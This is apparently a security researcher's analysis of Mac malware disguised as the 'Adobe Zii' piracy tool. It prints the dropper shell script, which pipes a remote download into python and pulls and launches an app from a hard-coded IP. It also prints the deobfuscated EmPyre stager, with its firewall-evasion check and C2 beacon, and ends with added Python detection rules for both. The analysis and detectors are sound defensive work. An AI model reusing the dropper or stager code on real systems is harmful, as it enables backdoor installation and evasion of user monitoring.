
Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools, the EmPyre backdoor and the XMRig cryptominer, for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. The malware installer, however, uses a generic Automator applet icon. (After all, if you're going to write software to help people steal Adobe software, why not steal the logo, too?)

Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

curl | python - &   # the URL of the Python script is not shown on the page
s=46.226.108.171:80
curl $s/sample.zip -o sample.zip
unzip sample.zip -d sample
cd sample
cd _MACOSX
open -a sample.app

This script is designed to download and execute a Python script, then download and run an app named sample.app. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually "legitimate." (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

import sys
import re, subprocess
# Look for a running Little Snitch process; the stager bails out if it finds one.
cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
    sys.exit()
import urllib2
UA='Mozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko'
server=''   # the server address is not shown on the page
t='/news.php'
req=urllib2.Request(server+t)
req.add_header('User-Agent',UA)
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=")

The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor's network connection to the attention of the user.
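The two artifacts described in this post, the Automator applet's dropper shell script and the stager's beacon to /news.php, can both be written up as detection checks. The block below is an added example for this post, not code from the original write-up or from the malware, and is written in Python 3 (the stager itself is Python 2). It assumes a hypothetical tab-separated proxy log format (client, client OS, method, path, user-agent, cookie); the log lines, the stand-in dropper script and its placeholder download URL and IP are constructed for the example. The path, cookie and user-agent values are the ones quoted from the stager above. The "Windows user-agent from a macOS host" check goes beyond the post's exact indicators: it generalises from the fact that the stager hard-codes an IE11 user-agent regardless of the host it runs on.

```python
"""Added example: detection checks for the dropper script and stager beacon
described in the post.  All sample inputs are constructed, not real captures."""
import re
from dataclasses import dataclass

# Indicators quoted from the deobfuscated stager.
C2_PATH = "/news.php"
STAGER_COOKIE = "session=SYDFioywtcFbUR5U3EST96SbqVk="
STAGER_UA = "Mozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko"

# Constructed proxy log in a hypothetical tab-separated format:
# client_ip  client_os  method  path  user_agent  cookie
SAMPLE_PROXY_LOG = """\
10.0.0.12\tmacOS\tGET\t/index.html\tMozilla/5.0 (Macintosh; Intel Mac OS X 10_14) Safari/605.1\t-
10.0.0.15\tmacOS\tGET\t/news.php\tMozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko\tsession=SYDFioywtcFbUR5U3EST96SbqVk=
10.0.0.20\tWindows\tGET\t/news.php\tMozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko\t-
"""


@dataclass
class Hit:
    client: str
    reasons: list


def scan_proxy_log(text):
    """Return one Hit per log line that matches the stager's beacon profile."""
    hits = []
    for line in text.splitlines():
        client, os_name, _method, path, ua, cookie = line.split("\t")
        reasons = []
        if cookie == STAGER_COOKIE:
            reasons.append("known stager session cookie")
        if path == C2_PATH and ua == STAGER_UA:
            reasons.append("stager path with stager user-agent")
        # The stager sends a Windows/IE11 user-agent no matter where it runs,
        # so that UA coming from a macOS client is suspicious on its own.
        if os_name == "macOS" and "Windows NT" in ua:
            reasons.append("Windows user-agent from macOS host")
        if reasons:
            hits.append(Hit(client, reasons))
    return hits


# Traits of the applet's shell script: a download piped straight into an
# interpreter, a server given as a bare IP:port, and an app that is unzipped
# from the download and then launched.
PIPE_TO_INTERPRETER = re.compile(r"\bcurl\b[^|\n]*\|\s*(python|perl|sh|bash)\b")
BARE_IP_SERVER = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\b")
OPEN_APP = re.compile(r"\bopen\s+-a\s+\S+\.app\b")


def score_shell_script(script):
    """Return the list of dropper traits found in a shell script's text."""
    traits = []
    if PIPE_TO_INTERPRETER.search(script):
        traits.append("download piped into interpreter")
    if BARE_IP_SERVER.search(script):
        traits.append("server given as bare IP address")
    if OPEN_APP.search(script) and re.search(r"\bunzip\b", script):
        traits.append("unzips and launches an app")
    return traits


# Constructed stand-in for the applet's script; the URL and IP are placeholders.
SAMPLE_DROPPER = """\
curl http://STAGER-URL-PLACEHOLDER/x | python - &
s=198.51.100.7:80
curl $s/sample.zip -o sample.zip
unzip sample.zip -d sample
cd sample/_MACOSX
open -a sample.app
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit.client, "->", "; ".join(hit.reasons))
    print("dropper traits:", score_shell_script(SAMPLE_DROPPER))
```

The proxy scan reports the macOS client on three counts and the Windows client on one: the cookie alone is a high-confidence match, while the path/user-agent pair and the OS mismatch are weaker signals that are worth alerting on together. The script scoring is deliberately generic, so it will also flag other "curl | python" droppers that fetch a payload from a bare IP and open whatever they unpack.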
